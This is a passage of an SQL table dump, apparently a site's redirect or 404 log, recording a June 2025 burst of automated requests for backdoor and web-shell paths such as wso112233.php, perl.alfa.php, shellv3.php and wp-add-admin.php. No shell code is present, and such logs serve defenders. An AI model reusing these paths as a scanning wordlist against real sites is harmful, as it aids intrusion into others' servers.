00:00:00',301),(40503,'http://3s-technologies.com.tr/tr/templates/ theme /error.php',NULL,'','',7,0,'2025-06-12 08:33:54','0000-00-00 00:00:00',301),(40504,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-blockdown.php',NULL,'','',7,0,'2025-06-12 08:33:57','0000-00-00 00:00:00',301),(40505,'http://3s-technologies.com.tr/tr/cgi-bin/users.php',NULL,'','',2,0,'2025-06-12 08:33:58','0000-00-00 00:00:00',301),(40506,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:34:00','0000-00-00 00:00:00',301),(40507,'http://3s-technologies.com.tr/tr/qcvobsth3u7.php',NULL,'','',4,0,'2025-06-12 08:34:05','0000-00-00 00:00:00',301),(40508,'http://3s-technologies.com.tr/tr/assets/index.php',NULL,'','',9,0,'2025-06-12 08:34:09','0000-00-00 00:00:00',301),(40509,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/db-safe-mode.php',NULL,'','',7,0,'2025-06-12 08:34:13','0000-00-00 00:00:00',301),(40510,'http://3s-technologies.com.tr/tr/uwjxhmro9am.php',NULL,'','',4,0,'2025-06-12 08:34:15','0000-00-00 00:00:00',301),(40511,'http://3s-technologies.com.tr/tr/cgi-bin/head.php',NULL,'','',2,0,'2025-06-12 08:34:17','0000-00-00 00:00:00',301),(40512,'http://3s-technologies.com.tr/tr/gank.php',NULL,'','',14,0,'2025-06-12 08:34:17','0000-00-00 00:00:00',301),(40513,'http://3s-technologies.com.tr/tr/wp-content/uploads/index',NULL,'','',4,0,'2025-06-12 08:34:19','0000-00-00 00:00:00',301),(40514,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:34:21','0000-00-00 00:00:00',301),(40515,'http://3s-technologies.com.tr/tr/wp-includes/images/index.php',NULL,'','',4,0,'2025-06-12 08:34:27','0000-00-00 00:00:00',301),(40516,'http://3s-technologies.com.tr/tr/templates/natural.php',NULL,'','',4,0,'2025-06-12 08:34:29','0000-00-00 00:00:00',301),(40517,'http://3s-technologies.com.tr/tr/wp-includes/css/admiin.php',NULL,'','',4,0,'2025-06-12 08:34:32','0000-00-00 00:00:00',301),(40518,'http://3s-technologies.com.tr/tr/.well-knownold/wso112233.php',NULL,'','',4,0,'2025-06-12 08:34:32','0000-00-00 00:00:00',301),(40519,'http://3s-technologies.com.tr/tr/wp-includes/requests/cong.php',NULL,'','',4,0,'2025-06-12 08:34:33','0000-00-00 00:00:00',301),(40520,'http://3s-technologies.com.tr/tr/yq7.php',NULL,'','',4,0,'2025-06-12 08:34:34','0000-00-00 00:00:00',301),(40521,'http://3s-technologies.com.tr/tr/wp-admin/maint/autoload_classmap.php',NULL,'','',4,0,'2025-06-12 08:34:37','0000-00-00 00:00:00',301),(40522,'http://3s-technologies.com.tr/tr/wp-includes/pomo/admiin.php',NULL,'','',4,0,'2025-06-12 08:34:42','0000-00-00 00:00:00',301),(40523,'http://3s-technologies.com.tr/tr/wp-content/plugins/vwcleanerplugin/bump.php',NULL,'','',14,0,'2025-06-12 08:34:49','0000-00-00 00:00:00',301),(40524,'http://3s-technologies.com.tr/tr/wp-includes/id3/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:34:51','0000-00-00 00:00:00',301),(40525,'http://3s-technologies.com.tr/tr/wp-includes/403.php',NULL,'','',4,0,'2025-06-12 08:34:56','0000-00-00 00:00:00',301),(40526,'http://3s-technologies.com.tr/tr/wp-content/themes/newstoday/lang.php',NULL,'','',4,0,'2025-06-12 08:35:00','0000-00-00 00:00:00',301),(40527,'http://3s-technologies.com.tr/tr/css/.tmp',NULL,'','',4,0,'2025-06-12 08:35:02','0000-00-00 00:00:00',301),(40528,'http://3s-technologies.com.tr/tr/secure',NULL,'','',4,0,'2025-06-12 08:35:03','0000-00-00 00:00:00',301),(40529,'http://3s-technologies.com.tr/tr/wp-content/plugins/xichang/x.php',NULL,'','',13,0,'2025-06-12 08:35:03','0000-00-00 00:00:00',301),(40530,'http://3s-technologies.com.tr/tr/gxurwgypkwi.php',NULL,'','',4,0,'2025-06-12 08:35:09','0000-00-00 00:00:00',301),(40531,'http://3s-technologies.com.tr/tr/storage',NULL,'','',4,0,'2025-06-12 08:35:12','0000-00-00 00:00:00',301),(40532,'http://3s-technologies.com.tr/tr/lhcbbks6ixn.php',NULL,'','',4,0,'2025-06-12 08:35:14','0000-00-00 00:00:00',301),(40533,'http://3s-technologies.com.tr/tr/wp-includes/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:35:18','0000-00-00 00:00:00',301),(40534,'http://3s-technologies.com.tr/tr/configs.php',NULL,'','',25,0,'2025-06-12 08:35:20','0000-00-00 00:00:00',301),(40535,'http://3s-technologies.com.tr/tr/zz.php/wp-includes/wp-includes_function.php',NULL,'','',4,0,'2025-06-12 08:35:25','0000-00-00 00:00:00',301),(40536,'http://3s-technologies.com.tr/tr/wp-content/xbrain.php',NULL,'','',4,0,'2025-06-12 08:35:29','0000-00-00 00:00:00',301),(40537,'http://3s-technologies.com.tr/tr/wp-includes/css/dist',NULL,'','',71,0,'2025-06-12 08:35:31','0000-00-00 00:00:00',301),(40538,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/00.php',NULL,'','',4,0,'2025-06-12 08:35:34','0000-00-00 00:00:00',301),(40539,'http://3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/g/f/f/b',NULL,'','',6,0,'2025-06-12 08:35:42','0000-00-00 00:00:00',301),(40540,'http://3s-technologies.com.tr/tr/hitech-news.com',NULL,'','',4,0,'2025-06-12 08:35:43','0000-00-00 00:00:00',301),(40541,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/list-reusable-blocks',NULL,'','',7,0,'2025-06-12 08:35:45','0000-00-00 00:00:00',301),(40542,'http://3s-technologies.com.tr/tr/wp_class_datalib.php',NULL,'','',7,0,'2025-06-12 08:35:46','0000-00-00 00:00:00',301),(40543,'http://3s-technologies.com.tr/tr/wp-includes/owg5lmjclxz.php',NULL,'','',4,0,'2025-06-12 08:35:48','0000-00-00 00:00:00',301),(40544,'http://3s-technologies.com.tr/tr/uploads/.1',NULL,'','',4,0,'2025-06-12 08:35:50','0000-00-00 00:00:00',301),(40545,'http://3s-technologies.com.tr/tr/wp-includes/js/x2.php',NULL,'','',4,0,'2025-06-12 08:35:53','0000-00-00 00:00:00',301),(40546,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/ab0ut.php',NULL,'','',4,0,'2025-06-12 08:35:54','0000-00-00 00:00:00',301),(40547,'http://3s-technologies.com.tr/tr/b0.php',NULL,'','',7,0,'2025-06-12 08:35:56','0000-00-00 00:00:00',301),(40548,'http://3s-technologies.com.tr/tr/wp-content/updraft/themes.php',NULL,'','',5,0,'2025-06-12 08:35:57','0000-00-00 00:00:00',301),(40549,'http://3s-technologies.com.tr/tr/wp-includes/ixr/xbrain.php',NULL,'','',4,0,'2025-06-12 08:35:59','0000-00-00 00:00:00',301),(40550,'http://3s-technologies.com.tr/tr/wp-content/themes/autoload_classmap.php',NULL,'','',4,0,'2025-06-12 08:36:00','0000-00-00 00:00:00',301),(40551,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/admin.php',NULL,'','',4,0,'2025-06-12 08:36:08','0000-00-00 00:00:00',301),(40552,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/wp-post.php',NULL,'','',4,0,'2025-06-12 08:36:11','0000-00-00 00:00:00',301),(40553,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:36:13','0000-00-00 00:00:00',301),(40554,'http://3s-technologies.com.tr/tr/app/wp-content/plugins/fix',NULL,'','',5,0,'2025-06-12 08:36:16','0000-00-00 00:00:00',301),(40555,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/index.php',NULL,'','',21,0,'2025-06-12 08:36:17','0000-00-00 00:00:00',301),(40556,'http://3s-technologies.com.tr/tr/zt.php',NULL,'','',4,0,'2025-06-12 08:36:20','0000-00-00 00:00:00',301),(40557,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519/ge/about.php',NULL,'','',4,0,'2025-06-12 08:36:21','0000-00-00 00:00:00',301),(40558,'http://3s-technologies.com.tr/tr/wp-includes/fonts/wp-conflg.php?p=',NULL,'','',4,0,'2025-06-12 08:36:24','0000-00-00 00:00:00',301),(40559,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/.info.php',NULL,'','',4,0,'2025-06-12 08:36:26','0000-00-00 00:00:00',301),(40560,'http://3s-technologies.com.tr/tr/csv.php',NULL,'','',16,0,'2025-06-12 08:36:27','0000-00-00 00:00:00',301),(40561,'http://3s-technologies.com.tr/tr/wp-includes/wp-atom.php',NULL,'','',7,0,'2025-06-12 08:36:31','0000-00-00 00:00:00',301),(40562,'http://3s-technologies.com.tr/tr/api/.config.php',NULL,'','',4,0,'2025-06-12 08:36:33','0000-00-00 00:00:00',301),(40563,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:36:38','0000-00-00 00:00:00',301),(40564,'http://3s-technologies.com.tr/tr/wp-admin/network/x2.php',NULL,'','',4,0,'2025-06-12 08:36:39','0000-00-00 00:00:00',301),(40565,'http://3s-technologies.com.tr/tr/admin/autoload_classmap.php',NULL,'','',5,0,'2025-06-12 08:36:39','0000-00-00 00:00:00',301),(40566,'http://3s-technologies.com.tr/tr/wp-content/plugins/html404/xccc.php',NULL,'','',7,0,'2025-06-12 08:36:41','0000-00-00 00:00:00',301),(40567,'http://3s-technologies.com.tr/tr/export.php',NULL,'','',22,0,'2025-06-12 08:36:43','0000-00-00 00:00:00',301),(40568,'http://3s-technologies.com.tr/tr/wp-content/plugins/classic-editor/classic-editor.php',NULL,'','',4,0,'2025-06-12 08:36:43','0000-00-00 00:00:00',301),(40569,'http://3s-technologies.com.tr/tr/p',NULL,'','',4,0,'2025-06-12 08:36:46','0000-00-00 00:00:00',301),(40570,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/xp.php',NULL,'','',4,0,'2025-06-12 08:36:47','0000-00-00 00:00:00',301),(40571,'http://3s-technologies.com.tr/tr/media/fgseetrrdqi.php',NULL,'','',4,0,'2025-06-12 08:36:47','0000-00-00 00:00:00',301),(40572,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview',NULL,'','',7,0,'2025-06-12 08:36:52','0000-00-00 00:00:00',301),(40573,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/wp-error_log.php?dir=.',NULL,'','',4,0,'2025-06-12 08:36:53','0000-00-00 00:00:00',301),(40574,'http://3s-technologies.com.tr/tr/wp-admin/css/item.php',NULL,'','',4,0,'2025-06-12 08:36:54','0000-00-00 00:00:00',301),(40575,'http://3s-technologies.com.tr/tr/wp-includes/js/chosen.php',NULL,'','',4,0,'2025-06-12 08:36:56','0000-00-00 00:00:00',301),(40576,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:37:04','0000-00-00 00:00:00',301),(40577,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:37:13','0000-00-00 00:00:00',301),(40578,'http://3s-technologies.com.tr/tr/wp-includes/interactivity-api',NULL,'','',10,0,'2025-06-12 08:37:15','0000-00-00 00:00:00',301),(40579,'http://3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/e/d/f/a/axfnwtvogks.php',NULL,'','',4,0,'2025-06-12 08:37:17','0000-00-00 00:00:00',301),(40580,'http://3s-technologies.com.tr/tr/wp-includes/assets/x2.php',NULL,'','',4,0,'2025-06-12 08:37:19','0000-00-00 00:00:00',301),(40581,'http://3s-technologies.com.tr/tr/wp-admin/network/b.php',NULL,'','',4,0,'2025-06-12 08:37:21','0000-00-00 00:00:00',301),(40582,'http://3s-technologies.com.tr/tr/wp-admin/friusgzt5d7.php',NULL,'','',4,0,'2025-06-12 08:37:22','0000-00-00 00:00:00',301),(40583,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/admiin.php',NULL,'','',4,0,'2025-06-12 08:37:23','0000-00-00 00:00:00',301),(40584,'http://3s-technologies.com.tr/tr/wp-content/plugins/upspy/sllolx.php',NULL,'','',7,0,'2025-06-12 08:37:24','0000-00-00 00:00:00',301),(40585,'http://3s-technologies.com.tr/tr/wp-admin/user/autoload_classmap.php',NULL,'','',7,0,'2025-06-12 08:37:28','0000-00-00 00:00:00',301),(40586,'http://3s-technologies.com.tr/tr/wp-includes/loe5823ryzm.php',NULL,'','',4,0,'2025-06-12 08:37:29','0000-00-00 00:00:00',301),(40587,'http://3s-technologies.com.tr/tr/blog/wp-includes/index.php',NULL,'','',4,0,'2025-06-12 08:37:29','0000-00-00 00:00:00',301),(40588,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/shell.php',NULL,'','',4,0,'2025-06-12 08:37:31','0000-00-00 00:00:00',301),(40589,'http://3s-technologies.com.tr/tr/index/admin.php',NULL,'','',22,0,'2025-06-12 08:37:32','0000-00-00 00:00:00',301),(40590,'http://3s-technologies.com.tr/tr/wp-content/uploads/network-settings.php',NULL,'','',4,0,'2025-06-12 08:37:34','0000-00-00 00:00:00',301),(40591,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/directionality',NULL,'','',4,0,'2025-06-12 08:37:36','0000-00-00 00:00:00',301),(40592,'http://3s-technologies.com.tr/tr/orxhmtiqhwn.php',NULL,'','',4,0,'2025-06-12 08:37:38','0000-00-00 00:00:00',301),(40593,'http://3s-technologies.com.tr/tr/nzouv.php',NULL,'','',4,0,'2025-06-12 08:37:44','0000-00-00 00:00:00',301),(40594,'http://3s-technologies.com.tr/tr/wp-includes/dbb75tx4asq.php',NULL,'','',4,0,'2025-06-12 08:37:44','0000-00-00 00:00:00',301),(40595,'http://3s-technologies.com.tr/tr/wp-includes/ixr/admiin.php',NULL,'','',4,0,'2025-06-12 08:37:48','0000-00-00 00:00:00',301),(40596,'http://3s-technologies.com.tr/tr/wp-admin/admiin.php',NULL,'','',4,0,'2025-06-12 08:37:50','0000-00-00 00:00:00',301),(40597,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/image',NULL,'','',6,0,'2025-06-12 08:37:53','0000-00-00 00:00:00',301),(40598,'http://3s-technologies.com.tr/tr/option-old.php',NULL,'','',4,0,'2025-06-12 08:37:56','0000-00-00 00:00:00',301),(40599,'http://3s-technologies.com.tr/tr/wp-content/themes/intense/block-css.php',NULL,'','',5,0,'2025-06-12 08:37:59','0000-00-00 00:00:00',301),(40600,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/class-wp-rest-core.php',NULL,'','',4,0,'2025-06-12 08:38:01','0000-00-00 00:00:00',301),(40601,'http://3s-technologies.com.tr/tr/wp-includes/requests/response/admiin.php',NULL,'','',4,0,'2025-06-12 08:38:06','0000-00-00 00:00:00',301),(40602,'http://3s-technologies.com.tr/tr/mahidu7t8ye.php',NULL,'','',4,0,'2025-06-12 08:38:07','0000-00-00 00:00:00',301),(40603,'http://3s-technologies.com.tr/tr/files/tinyfilemanager.php',NULL,'','',4,0,'2025-06-12 08:38:11','0000-00-00 00:00:00',301),(40604,'http://3s-technologies.com.tr/tr/wp-includes/blocks/heading',NULL,'','',4,0,'2025-06-12 08:38:11','0000-00-00 00:00:00',301),(40605,'http://3s-technologies.com.tr/tr/wp-includes/assets/classwithtostring.php',NULL,'','',4,0,'2025-06-12 08:38:20','0000-00-00 00:00:00',301),(40606,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/block-support.php',NULL,'','',12,0,'2025-06-12 08:38:21','0000-00-00 00:00:00',301),(40607,'http://3s-technologies.com.tr/tr/tqy.php',NULL,'','',4,0,'2025-06-12 08:38:25','0000-00-00 00:00:00',301),(40608,'http://3s-technologies.com.tr/tr/wp-content/uploads/tmp/.session.php',NULL,'','',4,0,'2025-06-12 08:38:26','0000-00-00 00:00:00',301),(40609,'http://3s-technologies.com.tr/tr/wp-content/uploads/xbrain.php',NULL,'','',4,0,'2025-06-12 08:38:28','0000-00-00 00:00:00',301),(40610,'http://3s-technologies.com.tr/tr/ds.php',NULL,'','',28,0,'2025-06-12 08:38:29','0000-00-00 00:00:00',301),(40611,'http://3s-technologies.com.tr/tr/cgi-bin/admin.php',NULL,'','',12,0,'2025-06-12 08:38:30','0000-00-00 00:00:00',301),(40612,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins-old/admin.php',NULL,'','',4,0,'2025-06-12 08:38:33','0000-00-00 00:00:00',301),(40613,'http://3s-technologies.com.tr/tr/css/wp-login.php',NULL,'','',4,0,'2025-06-12 08:38:34','0000-00-00 00:00:00',301),(40614,'http://3s-technologies.com.tr/tr/admin_logs.php',NULL,'','',6,0,'2025-06-12 08:38:35','0000-00-00 00:00:00',301),(40615,'http://3s-technologies.com.tr/tr/jny9.php',NULL,'','',4,0,'2025-06-12 08:38:35','0000-00-00 00:00:00',301),(40616,'http://3s-technologies.com.tr/tr/wp-admin/fmadmin.php',NULL,'','',5,0,'2025-06-12 08:38:39','0000-00-00 00:00:00',301),(40617,'http://3s-technologies.com.tr/tr/sim.php/wp-includes/certificates',NULL,'','',4,0,'2025-06-12 08:38:39','0000-00-00 00:00:00',301),(40618,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/yani',NULL,'','',4,0,'2025-06-12 08:38:44','0000-00-00 00:00:00',301),(40619,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse',NULL,'','',5,0,'2025-06-12 08:38:47','0000-00-00 00:00:00',301),(40620,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/autoload_classmap.php',NULL,'','',5,0,'2025-06-12 08:38:48','0000-00-00 00:00:00',301),(40621,'http://3s-technologies.com.tr/tr/t4myj.php',NULL,'','',4,0,'2025-06-12 08:38:49','0000-00-00 00:00:00',301),(40622,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/wp-login.php',NULL,'','',4,0,'2025-06-12 08:38:49','0000-00-00 00:00:00',301),(40623,'http://3s-technologies.com.tr/tr/wp-content/wp-tested.php',NULL,'','',4,0,'2025-06-12 08:38:52','0000-00-00 00:00:00',301),(40624,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519/ge/index.php?p=',NULL,'','',4,0,'2025-06-12 08:38:55','0000-00-00 00:00:00',301),(40625,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/core/curve25519/ge',NULL,'','',4,0,'2025-06-12 08:38:57','0000-00-00 00:00:00',301),(40626,'http://3s-technologies.com.tr/tr/wp-includes/wp_class_datlib.php',NULL,'','',22,0,'2025-06-12 08:38:59','0000-00-00 00:00:00',301),(40627,'http://3s-technologies.com.tr/tr/css/nop.php',NULL,'','',4,0,'2025-06-12 08:39:02','0000-00-00 00:00:00',301),(40628,'http://3s-technologies.com.tr/tr/wp-includes/pomo/admin.php',NULL,'','',4,0,'2025-06-12 08:39:06','0000-00-00 00:00:00',301),(40629,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioxi/ioxi',NULL,'','',7,0,'2025-06-12 08:39:07','0000-00-00 00:00:00',301),(40630,'http://3s-technologies.com.tr/tr/.well-known/s.php',NULL,'','',4,0,'2025-06-12 08:39:10','0000-00-00 00:00:00',301),(40631,'http://3s-technologies.com.tr/tr/wp-content/plugins/html404/cry.php.pjpeg',NULL,'','',7,0,'2025-06-12 08:39:10','0000-00-00 00:00:00',301),(40632,'http://3s-technologies.com.tr/tr/admin2.php',NULL,'','',7,0,'2025-06-12 08:39:11','0000-00-00 00:00:00',301),(40633,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-site',NULL,'','',4,0,'2025-06-12 08:39:12','0000-00-00 00:00:00',301),(40634,'http://3s-technologies.com.tr/tr/schema.php',NULL,'','',5,0,'2025-06-12 08:39:15','0000-00-00 00:00:00',301),(40635,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/ot_shipping.php',NULL,'','',4,0,'2025-06-12 08:39:18','0000-00-00 00:00:00',301),(40636,'http://3s-technologies.com.tr/tr/o7lsw.php',NULL,'','',4,0,'2025-06-12 08:39:19','0000-00-00 00:00:00',301),(40637,'http://3s-technologies.com.tr/tr/winamp/index.php',NULL,'','',4,0,'2025-06-12 08:39:20','0000-00-00 00:00:00',301),(40638,'http://3s-technologies.com.tr/tr/wp-admin/css/x2.php',NULL,'','',4,0,'2025-06-12 08:39:22','0000-00-00 00:00:00',301),(40639,'http://3s-technologies.com.tr/tr/wp-admin/maint/users.php',NULL,'','',4,0,'2025-06-12 08:39:25','0000-00-00 00:00:00',301),(40640,'http://3s-technologies.com.tr/tr/wp-admin/swm6p5zny1e.php',NULL,'','',4,0,'2025-06-12 08:39:26','0000-00-00 00:00:00',301),(40641,'http://3s-technologies.com.tr/tr/mwiowrjdxde.php',NULL,'','',4,0,'2025-06-12 08:39:31','0000-00-00 00:00:00',301),(40642,'http://3s-technologies.com.tr/tr/shellv3.php',NULL,'','',8,0,'2025-06-12 08:39:37','0000-00-00 00:00:00',301),(40643,'http://3s-technologies.com.tr/tr/public/index.php',NULL,'','',20,0,'2025-06-12 08:39:38','0000-00-00 00:00:00',301),(40644,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-stream.php',NULL,'','',7,0,'2025-06-12 08:39:38','0000-00-00 00:00:00',301),(40645,'http://3s-technologies.com.tr/tr/.tmb/mariju.php',NULL,'','',4,0,'2025-06-12 08:39:43','0000-00-00 00:00:00',301),(40646,'http://3s-technologies.com.tr/tr/wp-content/uploads/2019/dog.php',NULL,'','',4,0,'2025-06-12 08:39:46','0000-00-00 00:00:00',301),(40647,'http://3s-technologies.com.tr/tr/wp-content/x2.php',NULL,'','',4,0,'2025-06-12 08:39:50','0000-00-00 00:00:00',301),(40648,'http://3s-technologies.com.tr/tr/wp-includes/js/dist',NULL,'','',56,0,'2025-06-12 08:39:55','0000-00-00 00:00:00',301),(40649,'http://3s-technologies.com.tr/tr/wp-admin/maint/atomlib.php/sym.php',NULL,'','',4,0,'2025-06-12 08:39:57','0000-00-00 00:00:00',301),(40650,'http://3s-technologies.com.tr/tr/tsrbxmo.php',NULL,'','',4,0,'2025-06-12 08:39:59','0000-00-00 00:00:00',301),(40651,'http://3s-technologies.com.tr/tr/cgi-bin/b.php',NULL,'','',2,0,'2025-06-12 08:40:02','0000-00-00 00:00:00',301),(40652,'http://3s-technologies.com.tr/tr/y7.php',NULL,'','',4,0,'2025-06-12 08:40:03','0000-00-00 00:00:00',301),(40653,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/admiin.php',NULL,'','',4,0,'2025-06-12 08:40:07','0000-00-00 00:00:00',301),(40654,'http://3s-technologies.com.tr/tr/wkg.php',NULL,'','',4,0,'2025-06-12 08:40:09','0000-00-00 00:00:00',301),(40655,'http://3s-technologies.com.tr/tr/wp-admin/umpvr1ersn8.php',NULL,'','',4,0,'2025-06-12 08:40:09','0000-00-00 00:00:00',301),(40656,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/z4x.php',NULL,'','',4,0,'2025-06-12 08:40:13','0000-00-00 00:00:00',301),(40657,'http://3s-technologies.com.tr/tr/wp-content/plugins/yyobang/mar.php',NULL,'','',10,0,'2025-06-12 08:40:14','0000-00-00 00:00:00',301),(40658,'http://3s-technologies.com.tr/tr/wp-includes/css/wp-config.php',NULL,'','',7,0,'2025-06-12 08:40:15','0000-00-00 00:00:00',301),(40659,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/cloud.php',NULL,'','',4,0,'2025-06-12 08:40:16','0000-00-00 00:00:00',301),(40660,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresss3cll/wp-login.php',NULL,'','',6,0,'2025-06-12 08:40:16','0000-00-00 00:00:00',301),(40661,'http://3s-technologies.com.tr/tr/bru.php',NULL,'','',4,0,'2025-06-12 08:40:17','0000-00-00 00:00:00',301),(40662,'http://3s-technologies.com.tr/tr/tmp_images/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:40:19','0000-00-00 00:00:00',301),(40663,'http://3s-technologies.com.tr/tr/css/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:40:21','0000-00-00 00:00:00',301),(40664,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce',NULL,'','',28,0,'2025-06-12 08:40:25','0000-00-00 00:00:00',301),(40665,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wpview',NULL,'','',4,0,'2025-06-12 08:40:26','0000-00-00 00:00:00',301),(40666,'http://3s-technologies.com.tr/tr/wp-content/uploads/good.php',NULL,'','',4,0,'2025-06-12 08:40:27','0000-00-00 00:00:00',301),(40667,'http://3s-technologies.com.tr/tr/wp-includes/assets/xbrain.php',NULL,'','',4,0,'2025-06-12 08:40:31','0000-00-00 00:00:00',301),(40668,'http://3s-technologies.com.tr/tr/admin-footer.php',NULL,'','',29,0,'2025-06-12 08:40:36','0000-00-00 00:00:00',301),(40669,'http://3s-technologies.com.tr/tr/images/server.php',NULL,'','',4,0,'2025-06-12 08:40:38','0000-00-00 00:00:00',301),(40670,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/themes-install.php',NULL,'','',4,0,'2025-06-12 08:40:42','0000-00-00 00:00:00',301),(40671,'http://3s-technologies.com.tr/tr/wp-admin/fipchgi5lwx.php',NULL,'','',4,0,'2025-06-12 08:40:44','0000-00-00 00:00:00',301),(40672,'http://3s-technologies.com.tr/tr/wp-content/plugins/upspy/up.php',NULL,'','',7,0,'2025-06-12 08:40:47','0000-00-00 00:00:00',301),(40673,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/includes/external/page',NULL,'','',5,0,'2025-06-12 08:40:49','0000-00-00 00:00:00',301),(40674,'http://3s-technologies.com.tr/tr/sidebar.php',NULL,'','',4,0,'2025-06-12 08:40:51','0000-00-00 00:00:00',301),(40675,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/ben.php',NULL,'','',4,0,'2025-06-12 08:40:52','0000-00-00 00:00:00',301),(40676,'http://3s-technologies.com.tr/tr/wp-content/uploads/ year / month',NULL,'','',7,0,'2025-06-12 08:40:53','0000-00-00 00:00:00',301),(40677,'http://3s-technologies.com.tr/tr/bob.php?p=',NULL,'','',4,0,'2025-06-12 08:40:54','0000-00-00 00:00:00',301),(40678,'http://3s-technologies.com.tr/tr/wp-includes/wp-shell.php',NULL,'','',4,0,'2025-06-12 08:41:01','0000-00-00 00:00:00',301),(40679,'http://3s-technologies.com.tr/tr/wp-add-admin.php',NULL,'','',10,0,'2025-06-12 08:41:01','0000-00-00 00:00:00',301),(40680,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana',NULL,'','',4,0,'2025-06-12 08:41:06','0000-00-00 00:00:00',301),(40681,'http://3s-technologies.com.tr/tr/pqykotir2.php',NULL,'','',4,0,'2025-06-12 08:41:07','0000-00-00 00:00:00',301),(40682,'http://3s-technologies.com.tr/tr/wp-admin/ahqpecj6oky.php',NULL,'','',4,0,'2025-06-12 08:41:09','0000-00-00 00:00:00',301),(40683,'http://3s-technologies.com.tr/tr/class-php',NULL,'','',19,0,'2025-06-12 08:41:10','0000-00-00 00:00:00',301),(40684,'http://3s-technologies.com.tr/tr/htdocs/shell',NULL,'','',4,0,'2025-06-12 08:41:12','0000-00-00 00:00:00',301),(40685,'http://3s-technologies.com.tr/tr/gins/wp-help',NULL,'','',4,0,'2025-06-12 08:41:15','0000-00-00 00:00:00',301),(40686,'http://3s-technologies.com.tr/tr/index/ben.php?dir=.',NULL,'','',4,0,'2025-06-12 08:41:15','0000-00-00 00:00:00',301),(40687,'http://3s-technologies.com.tr/tr/conf_upload.php',NULL,'','',8,0,'2025-06-12 08:41:16','0000-00-00 00:00:00',301),(40688,'http://3s-technologies.com.tr/tr/wp-includes/requests/auth/images.php',NULL,'','',5,0,'2025-06-12 08:41:19','0000-00-00 00:00:00',301),(40689,'http://3s-technologies.com.tr/tr/wp-includes/id3/file.php',NULL,'','',13,0,'2025-06-12 08:41:21','0000-00-00 00:00:00',301),(40690,'http://3s-technologies.com.tr/tr/wp-content/plugins/classic-editor/about.php',NULL,'','',4,0,'2025-06-12 08:41:22','0000-00-00 00:00:00',301),(40691,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/index.php/.well-known/pki-validation/xmrlpc.php',NULL,'','',4,0,'2025-06-12 08:41:26','0000-00-00 00:00:00',301),(40692,'http://3s-technologies.com.tr/tr/ben.php',NULL,'','',10,0,'2025-06-12 08:41:29','0000-00-00 00:00:00',301),(40693,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/indexx.php',NULL,'','',4,0,'2025-06-12 08:41:31','0000-00-00 00:00:00',301),(40694,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/wp-post.php',NULL,'','',4,0,'2025-06-12 08:41:33','0000-00-00 00:00:00',301),(40695,'http://3s-technologies.com.tr/tr/wp-includes/wjacfltdmpx.php',NULL,'','',4,0,'2025-06-12 08:41:36','0000-00-00 00:00:00',301),(40696,'http://3s-technologies.com.tr/tr/images/edit.php',NULL,'','',5,0,'2025-06-12 08:41:37','0000-00-00 00:00:00',301),(40697,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms',NULL,'','',4,0,'2025-06-12 08:41:42','0000-00-00 00:00:00',301),(40698,'http://3s-technologies.com.tr/tr/cgi-bin/bak.php?p=',NULL,'','',2,0,'2025-06-12 